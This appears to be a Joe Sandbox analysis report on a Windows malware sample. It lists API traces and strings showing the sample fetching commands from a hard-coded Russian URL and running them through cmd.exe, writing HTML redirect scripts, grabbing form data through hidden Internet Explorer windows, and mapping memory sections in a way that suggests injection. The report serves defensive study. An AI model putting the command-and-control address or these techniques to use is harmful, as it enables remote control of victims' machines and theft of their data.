                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            Function 004068B0 Relevance: 61.5, APIs: 22, Strings: 13, Instructions: 221stringprocessfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 382 4068b0-4068c1 383 4068c7-4068e1 call 405f5b 382->383 386 4068e7-40690f call 403619 383->386 387 406c0c-406c1d _sleep 383->387 390 406be1-406bfb call 4043bf 386->390 391 406915 386->391 387->383 394 406c01-406c07 LocalFree 390->394 395 40691a-406921 390->395 391->387 394->387 395->390 396 406927-40692e 395->396 397 406934-40693b 396->397 398 406a66-406a7e call 40143b 396->398 397->398 400 406941-406970 sscanf 397->400 398->390 404 406a84-406aa7 atoi 398->404 402 406972-406995 rand 400->402 403 40699b-4069a2 400->403 402->390 402->403 405 4069a4-4069d9 sprintf * 2 403->405 406 4069db-406a24 GetWindowsDirectoryA sprintf strcat 403->406 404->390 408 406aad-406aef sprintf call 407a04 lstrlenA 404->408 407 406a27-406a61 DeleteFileA sprintf WinExec 405->407 406->407 407->398 411 406b17-406b1e 408->411 412 406b20-406bdc sprintf lstrlenA * 2 LocalAlloc call 407a04 lstrlenA call 407a04 CreateThread CloseHandle 411->412 413 406af1-406aff 411->413 412->390 414 406b11 413->414 415 406b01-406b0f 413->415 414->411 415->412
                            APIs
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?), ref: 00405F73
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,?), ref: 00405F7E
                              • Part of subcall function 00405F5B: LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                              • Part of subcall function 00405F5B: lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                              • Part of subcall function 00405F5B: DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                              • Part of subcall function 00405F5B: CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                              • Part of subcall function 00405F5B: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                              • Part of subcall function 00405F5B: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                              • Part of subcall function 00405F5B: CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            • sscanf.CRTDLL(0000003A,:%02u,?), ref: 0040695B
                            • rand.CRTDLL ref: 00406972
                            • sprintf.CRTDLL(?,%s\cmd.pif,00429080), ref: 004069B5
                            • sprintf.CRTDLL(?,%s\cmd.exe,00429080,?,%s\cmd.pif,00429080), ref: 004069D1
                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 004069E7
                            • sprintf.CRTDLL(?,%s\command.pif,?,?,00000400), ref: 00406A0E
                            • strcat.CRTDLL(?,\command.com,?,%s\command.pif,?,?,00000400), ref: 00406A1F
                            • DeleteFileA.KERNEL32(?,?,?,?,?,00000400), ref: 00406A2E
                            • sprintf.CRTDLL(?,%s /C %s,?,00000036,?,?,?,?,?,00000400), ref: 00406A50
                            • WinExec.KERNEL32(?,00000000), ref: 00406A61
                            • atoi.CRTDLL(00000035), ref: 00406A8E
                            • sprintf.CRTDLL(?,%s\Rtdx1%i.dat,00429080,0000000C), ref: 00406AC4
                            • lstrlenA.KERNEL32(?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406AE4
                            • sprintf.CRTDLL(0000002F,%s/Rtdx1%i.htm,0000002F,0000000C,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B45
                            • lstrlenA.KERNEL32(?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B54
                            • lstrlenA.KERNEL32(0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B66
                            • LocalAlloc.KERNEL32(00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406B78
                            • lstrlenA.KERNEL32(?,?,?,00000040,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406BA2
                            • CreateThread.KERNEL32(00000000,00000000,Function_0000686C,?,00000000,0000000C), ref: 00406BD6
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,Function_0000686C,?,00000000,0000000C,?,0000002F,?,?,?,00000040,?,0000002F,?), ref: 00406BDC
                            • LocalFree.KERNEL32(?,?,0000002F,?,?,?,?,http://tat-neftbank.ru/wcmd.htm), ref: 00406C07
                            • _sleep.CRTDLL(001B7740), ref: 00406C17
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$sprintf$LocalThread$AllocCloseCreateDeleteHandle$CacheCodeDirectoryEntryExecExitFileFreeObjectSingleWaitWindows_sleepatoirandsscanfstrcat
                            • String ID: %s /C %s$%s/Rtdx1%i.htm$%s\Rtdx1%i.dat$%s\cmd.exe$%s\cmd.pif$%s\command.pif$/$:$:$:%02u$\command.com$http://tat-neftbank.ru/wcmd.htm$wupd
                            • API String ID: 4275340860-3363018154
                            • Opcode ID: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction ID: 18f08bfc30c9890c11dd244c38850a50baba5aa484248b9ca7ce56826a71177a
                            • Opcode Fuzzy Hash: db39d86638ff862d2fb6c91229f091ab8a43fd21800a492105b3074faeac2b45
                            • Instruction Fuzzy Hash: 328163B1E08228ABDB21A6658D46BD977BCDB04304F5105F7E60CB21C1E67C7F948F99
                            Function 004052E0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 115sleepstringprocessCOMMON
                            Download Yara Rule
                            APIs
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052F8
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?,?,?,?), ref: 0040530B
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,?,?,?,?,?,00000104,?), ref: 0040532C
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040539F
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053B2
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004053D4
                            • Sleep.KERNEL32(00007800,00000000,00000000,00000044,?), ref: 00405426
                            • Sleep.KERNEL32(0000F000,00007800,00000000,00000000,00000044,?), ref: 00405439
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405451
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405499
                            • LocalFree.KERNEL32(?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054A5
                            • TerminateProcess.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054B2
                            • CloseHandle.KERNEL32(?,?,00000000,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 004054BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandleProcessSleepThreadstrcat$CreateCurrentDeleteDesktopFileFreeLocalTerminateTextWindowmemsetsprintf
                            • String ID: %s%u - Microsoft Internet Explorer$D$MicroSoft-Corp$X-okRecv11$\Iexplore.exe
                            • API String ID: 1202517094-2261298365
                            • Opcode ID: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction ID: a5954b523feb805065d44168e487e19d6cbd8b1c6e851fe6a795fce517e83f05
                            • Opcode Fuzzy Hash: e98e409644201e6de021147ee2f0c1805f35588af9548cc9b8076052c01221a7
                            • Instruction Fuzzy Hash: 4F416572E442186ADB20AA65CC46BDDB3B99F50305F1444F7E208F61D1DABCAEC48F59
                            Function 00401B9F Relevance: 26.7, APIs: 11, Strings: 4, Instructions: 487memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(value), ref: 00401BCC
                              • Part of subcall function 004017AC: CoInitialize.OLE32(00000000), ref: 004017CC
                              • Part of subcall function 004017AC: CLSIDFromString.OLE32({9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 004017DA
                              • Part of subcall function 004017AC: CoCreateInstance.OLE32(?,00000000,?,0042CD50,?,{9BA05972-F6A8-11CF-A442-00A0C90A8F39},?), ref: 00401803
                            • _sleep.CRTDLL(00000000), ref: 00401BFD
                            • GetForegroundWindow.USER32(00000000), ref: 00401C02
                              • Part of subcall function 0040185F: GetWindowTextA.USER32(?,?,?), ref: 004018E2
                            • memcpy.CRTDLL(00418F40,?,?), ref: 00401D6D
                            • memcpy.CRTDLL(?,00418F40,?), ref: 00401F34
                            • _sleep.CRTDLL(00000000), ref: 00401F4A
                            • sprintf.CRTDLL(?,%s FORM_%X,?,?,00000000), ref: 00401F77
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: StringWindow_sleepmemcpy$AllocCreateForegroundFromInitializeInstanceTextsprintf
                            • String ID: %s %X%c$%s FORM_%X$%s%c$value
                            • API String ID: 3510745994-3693252589
                            • Opcode ID: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction ID: 207a0c2c24704257dc82047f11ad41d7b25eba1db427a6dda8aff0efe7f4a5ef
                            • Opcode Fuzzy Hash: 97066158e7caddc246d118ad30601bc5e86c518a965b60cc81196b9f5f35fe85
                            • Instruction Fuzzy Hash: 2112DC71A002199FDB62DB68CD44BDAB7F9BB0C304F5040FAA588E7290D7B4AAC58F55
                            Function 00402822 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 34libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                            • GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                            • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                            • GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                            • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: NtMapViewOfSection$NtOpenSection$NtUnmapViewOfSection$RtlInitUnicodeString$RtlNtStatusToDosError$ntdll.dll
                            • API String ID: 667068680-1987783197
                            • Opcode ID: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction ID: 9d3c92be313ac2760b75685e9acc68d9338f811418752029c31410863af0f615
                            • Opcode Fuzzy Hash: f3f948102971a568e61a5bb1a738835a59e2c1009918de6079867c1c535b5a8b
                            • Instruction Fuzzy Hash: BCF03A21B642206B93126B327D4293E36689792B19395003FF840F6191DB7C09225F9F
                            Function 00402E06 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 337libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            Function 004037AA Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • printf.CRTDLL([length=%i] [summ=%i],?,00000000), ref: 004037DD
                            • printf.CRTDLL(HEX: ,[length=%i] [summ=%i],?,00000000), ref: 004037EE
                            • printf.CRTDLL(%02X ,00000000), ref: 00403804
                            • printf.CRTDLL(TXT: '%s',?), ref: 0040382C
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: TXT: '%s'$%02X $HEX: $X4$[length=%i] [summ=%i]
                            • API String ID: 3524737521-4004101572
                            • Opcode ID: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction ID: a8ef6db4a05ad48ab0456940bf437e850f92713de92630681f76b68ebadef0f7
                            • Opcode Fuzzy Hash: ca4ded32e23903f7249d6c5dbeb3a47121f77b3b45ed42eb0d7ff3160f68b428
                            • Instruction Fuzzy Hash: 88016B62A04254BED7006FA7CC82A6F7FDCAB4175AF2080BEF545730C0D1B86F41D6A6
                            Function 004054D7 Relevance: 15.1, APIs: 10, Instructions: 109stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 004054F1
                            • lstrlenA.KERNEL32(?,?), ref: 00405505
                            • lstrlenA.KERNEL32(?,?,?), ref: 00405513
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                            • LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                            • memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006), ref: 004055FE
                            Memory Dump Source
                            • Source File: 00000002.00000002.1981974586.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000002.00000002.1981915377.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982006776.000000000042A000.00000004.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982081281.000000000042E000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982109328.000000000042F000.00000002.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982129135.0000000000436000.00000020.00000001.01000000.00000005.sdmpDownload File
                            • Associated: 00000002.00000002.1982146402.0000000000438000.00000002.00000001.01000000.00000005.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_400000_Ogjdllpi.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCloseCodeCreateExitHandleLocalObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 2845097592-0
                            • Opcode ID: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction ID: 017c82820a2f145177c9e28e2e3f5c0bebc6ad2cdfe5315ab2aa4ad5daf85086
                            • Opcode Fuzzy Hash: 7ec933356805a86d395f76af41b9b2d9f18e99f1d3eeeb5c371ae48cad7448a7
                            • Instruction Fuzzy Hash: 5E31D721A04159BACF01DFA6CC01AAEB7F9AF44318F144476F904E7291E63CDB15C7A9
                            Function 00405F5B Relevance: 13.6, APIs: 9, Instructions: 64stringthreadmemoryCOMMON
                            Download Yara Rule
                            APIs
